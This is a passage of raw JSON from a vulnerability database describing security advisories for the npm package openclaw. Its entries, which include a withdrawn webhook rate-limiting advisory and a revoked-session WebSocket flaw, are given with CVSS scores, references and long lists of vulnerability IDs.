nerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.13"}],"aliases":["GHSA-xwcj-hwhf-h378"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-gncw-wfqt-9yek"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91067?format=json","vulnerability_id":"VCID-gv2d-gfs7-gfh1","summary":"Duplicate Advisory: OpenClaw has Bypass in Webhook Rate Limiting via Pre-Authentication Secret Validation\n### Duplicate Advisory\nThis advisory has been withdrawn because CVE-2026-34508 has been rejected as a duplicate of CVE-2026-34505. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.3.12 applies rate limiting only after webhook authentication succeeds, allowing attackers to bypass rate limits and brute-force webhook secrets without triggering 429 responses. 
Attackers can repeatedly guess invalid secrets to discover valid credentials and subsequently submit forged Zalo webhook traffic.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-5m9r-p9g7-679c","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-5m9r-p9g7-679c"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34508","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34508"},{"reference_url":"http
s://www.vulncheck.com/advisories/openclaw-webhook-rate-limiting-bypass-via-pre-authentication-secret-validation-2","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-webhook-rate-limiting-bypass-via-pre-authentication-secret-validation-2"},{"reference_url":"https://github.com/advisories/GHSA-8288-jpqp-95fx","reference_id":"GHSA-8288-jpqp-95fx","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-8288-jpqp-95fx"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/112780?format=json","purl":"pkg:npm/openclaw@2026.3.12","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p
-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b
-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1
-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs
-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu
-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2
-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.12"}],"aliases":["CVE-2026-34508","GHSA-8288-jpqp-95fx"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-gv2d-gfs7-gfh1"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91842?format=json","vulnerability_id":"VCID-gvam-2net-8kc5","summary":"OpenClaw's device removal and token revocation do not terminate active WebSocket sessions\n## Summary\n\nRemoving a device or revoking its token updated stored credentials but did not disconnect already-authenticated WebSocket sessions.\n\n## Impact\n\nA revoked device could continue using its existing live session until reconnect, extending access beyond credential removal.\n\n## Affected Component\n\n`src/gateway/server-methods/devices.ts, src/gateway/server.impl.ts`\n\n## Fixed Versions\n\n- Affected: `<= 2026.3.24`\n- Patched: `>= 2026.3.28`\n- Latest stable `2026.3.28` contains the fix.\n\n## Fix\n\nFixed by commit `7a801cc451` (`Gateway: disconnect revoked device sessions`).\n\nOpenClaw thanks @AntAISecurityLab for 
reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-34503","reference_id":"","reference_type":"","scores":[{"value":"0.00012","scoring_system":"epss","scoring_elements":"0.01851","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00012","scoring_system":"epss","scoring_elements":"0.01855","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00014","scoring_system":"epss","scoring_elements":"0.02731","published_at":"2026-06-07T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-34503"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/7a801cc451e9e667b705eeccff651923a1b8c863","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-02T15:12:24Z/"}],"url":"https://github.com/openclaw/openclaw/commit/7a801cc451e9e667b705eeccff651923a1b8c863"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-2pr2-hcv6-7gwv","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-02T15:12:24Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-2pr2-hcv6-7gwv"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34503","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34503"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-incomplete-websocket-session-termination-on-device-removal-and-token-revocation","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-02T15:12:24Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-incomplete-websocket-session-termination-on-device-removal-and-token-revocation"},{"referenc
e_url":"https://github.com/advisories/GHSA-2pr2-hcv6-7gwv","reference_id":"GHSA-2pr2-hcv6-7gwv","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-2pr2-hcv6-7gwv"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109863?format=json","purl":"pkg:npm/openclaw@2026.3.28","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"v
